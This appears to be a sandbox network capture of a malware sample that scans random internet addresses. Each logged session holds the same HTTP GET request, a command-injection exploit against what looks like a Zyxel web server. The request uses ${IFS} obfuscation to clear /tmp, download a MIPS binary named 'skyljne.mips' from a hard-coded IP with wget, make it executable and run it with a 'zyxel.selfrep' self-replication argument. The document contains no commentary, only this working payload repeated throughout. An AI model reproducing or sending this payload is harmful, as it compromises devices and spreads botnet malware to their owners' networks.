                                          Jan 14, 2024 15:46:19.055339098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4957192.168.2.235285640.209.125.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055387974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4958192.168.2.2356748220.114.22.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055438042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4959192.168.2.234946627.56.78.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055455923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4960192.168.2.234225445.223.205.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055512905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4961192.168.2.2339616177.163.217.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055583954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4962192.168.2.235869077.236.113.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055604935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4963192.168.2.233893841.97.191.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4964192.168.2.2336334213.211.92.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055655956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4965192.168.2.234551480.247.66.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055666924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4966192.168.2.2345482168.185.40.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055718899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4967192.168.2.2337220207.88.70.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055746078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4968192.168.2.235276450.76.25.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055813074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4969192.168.2.2338470203.210.159.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055830002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4970192.168.2.2357316141.3.14.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055869102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4971192.168.2.2344132207.109.202.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055926085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4972192.168.2.2336588126.229.69.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055953026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4973192.168.2.235203277.41.253.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.055979967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4974192.168.2.2360580101.26.211.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056015015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4975192.168.2.234148469.192.37.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056090117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4976192.168.2.2337638161.210.11.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056140900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4977192.168.2.2357114153.79.40.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056181908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4978192.168.2.2337918130.90.187.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056216955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4979192.168.2.235289243.24.199.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056257010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4980192.168.2.2335966141.208.220.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056299925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4981192.168.2.2355162157.168.90.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056348085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4982192.168.2.235557897.8.18.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056385040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4983192.168.2.235961660.194.140.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056394100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4984192.168.2.2347666175.230.28.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056436062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4985192.168.2.2334104105.48.194.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056480885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4986192.168.2.2341346109.129.165.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056559086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4987192.168.2.2358766118.155.11.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056583881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4988192.168.2.235896874.123.226.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056617022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4989192.168.2.2335002174.50.104.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056642056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4990192.168.2.235779031.78.63.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056725979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4991192.168.2.23455201.232.214.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056741953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4992192.168.2.233953258.239.231.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056756973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4993192.168.2.233970264.62.210.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056797028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4994192.168.2.2339998138.176.48.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056873083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4995192.168.2.235131488.196.229.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056905031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4996192.168.2.234261262.125.216.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056935072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4997192.168.2.2349422163.2.144.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.056955099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4998192.168.2.2340962117.117.245.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057004929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4999192.168.2.235502692.114.102.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057038069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5000192.168.2.2339480107.126.156.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057050943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5001192.168.2.2343046208.205.197.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057102919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5002192.168.2.235464063.97.238.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057141066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5003192.168.2.233622472.41.55.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057173967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5004192.168.2.235886266.195.103.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057226896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5005192.168.2.2337148216.169.43.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057276011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5006192.168.2.2353712171.209.76.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057290077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5007192.168.2.233681868.147.113.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057329893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5008192.168.2.2344390183.163.177.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057373047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5009192.168.2.234466623.157.65.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057435036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5010192.168.2.233453299.19.89.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057459116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5011192.168.2.235118473.50.83.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057493925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5012192.168.2.2354962165.24.130.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057574987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5013192.168.2.2346414221.55.164.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057595015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5014192.168.2.233931618.49.61.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057661057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5015192.168.2.2340680123.242.173.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057689905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5016192.168.2.234363843.4.1.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057722092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5017192.168.2.235770293.238.175.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057771921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5018192.168.2.233927297.200.2.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057813883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5019192.168.2.2339510133.149.129.220443
                                          TimestampBytes transferredDirectionData
